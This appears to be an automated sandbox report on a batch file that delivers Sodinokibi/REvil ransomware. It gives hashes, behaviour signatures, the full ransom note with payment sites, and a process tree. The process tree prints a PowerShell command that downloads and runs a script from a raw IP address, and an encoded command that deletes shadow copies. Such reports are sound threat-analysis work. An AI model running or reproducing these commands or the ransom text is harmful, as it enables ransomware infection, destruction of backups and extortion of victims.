Overview

overview

10

Static

static

4HwraGxu.bat

windows7_x64

10

4HwraGxu.bat

windows10_x64

10

Analysis

  • max time kernel
    124s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    05-03-2020 03:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    4HwraGxu.bat

  • Size

    196B

  • MD5

    94f125fc020eddcb4d532de46bae7e6f

  • SHA1

    9a82eeac0dde9462f567e745ffe97b821ee717d6

  • SHA256

    ce85bc90b8156bbafb9f66b7673730dc456ac31b96a6b2a44a1e2905ed49dd16

  • SHA512

    51f5b3338698456e0d3c67d56dc18f534ba4ebda6bf1aa4f0cf2094431abca7d1aafa9df4ab6b9f76c47e45eb122b33088e5fefac658be80f2749f73fdf90ee4

Score
10/10
ransomwaresodinokibipersistenceevasionspywaretrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/4HwraGxu

Extracted

Path

C:\mp62m85-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension mp62m85. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5604F8BF38983AB7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5604F8BF38983AB7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: a4P8itYCLx0uF3GOKi26c/xCaUIfzxzWHWiaqRaTzXxJhrecp0ggfel5qER8YUto 8bUDeqBU33gaHBdqzY8VYG/gpD7BlPBey+eY1S9DcOufoTFlYXcDpn+WHZwsdQZa f4Opucvo036/jAAXMPqR7Nq3G0v8n04Dngutcb6oSwa6rrK+8deeRFu/tD2UhYPj 6vEHb5VkLDTnjHcs7NXtdX8TfhomdhgJ/rPe+qN35plET5Ro1HmajvUsoMNtF6Fg suUroDUkTg4s930pxTYKY63rKdMivbcZcydHA3CyYa5xbQAx/WZkYVZ9X4cT0Ct3 gKNz0+zThxrQ9I36yGnS7/bw4c15FvhANLyXNtD0kWDYMIM7HpRi31Fq4NMbfS+a /wq99526MxoSaPtw4ngYRdvSORqhA5p903baLEwPrzr0qRz0pFBXVYRdI38BCgL1 zSVCrMwd11yyic2VXnQ1bu8UupxshgK611TifCN0MJIKUU9gYUw4UxLwyCWNPS1y phKbDGyWs4cc8K/I85tbSXwoVsynZDtgg0MKXtysPZ7ZT/aMs5CkW9PM58wuMIbe KlC5yThh7w4098V+BdWC3A0H5sdUvu+SKFR4FkiyTMkd7t5TwLdMHHq8FlHYY68L IzTW3n+CPzD5SrFaePFwnWccCmLMZK4+QjJxhpm3nmdLjdvoL459eIsV/8SHT7Fo gfXnEm4EJerHdnseZEgeV2M6LpYrNNrn32S7KlTX0OoQfAcftfKZ5PagVTkP9DYk ztFHe5RJYSE0bxS6NbY9ZIqblIcrnxn5ao2RzNQwDayQfbKJNCmJsGYINtJ/AIe5 EOxaq4cuPSxoKmeyQb6HdjDbqPnWag9oob5dawFA9sbyncMHPe8OH8LPcmatDUdz iCSrq2a2Kkq1dURkB7yykV57DR+6kZrR0Skj5moCl3gMJ7cTrMafZooJ8izmRU7w wd02aEo201/theKjN69/HDTzuF6082g58aefKNgU9tahv66hCn/Sw+qAhkD0wdKu 7PilSzDJTkreQ/BCPdLXNAk5VeD2FO9GJSC4GmyTGLgxXDOonlVtAk8FLufoiMdx n3fsZgrEuV6pZEsoL5aM/IEPcfUR9Pb4gfk9iFKSu5d7Eumuib8iUA4G7OSTE3Up c33F9pB+gYe3pwsUQyTlfdRtLnwqi+rnl7LbzW7m7uUy7irz8HLf0LlJu2i7iOD2 9YjNTahC/MhaBoqMK23SGQ/aGTon3VesUrOXWnK9pKbEqg0wO8gPQjl99vOFrbIl QDlnX0LEL+eTRPfSpD46QEmlMIAU4ujOdir8aJWahpL5MQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5604F8BF38983AB7

http://decryptor.cc/5604F8BF38983AB7

Signatures

  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 33 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Blacklisted process makes network request 132 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\4HwraGxu.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1848
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4HwraGxu');Invoke-MRESRVFEKYADT;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      PID:1872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1972
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1396

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit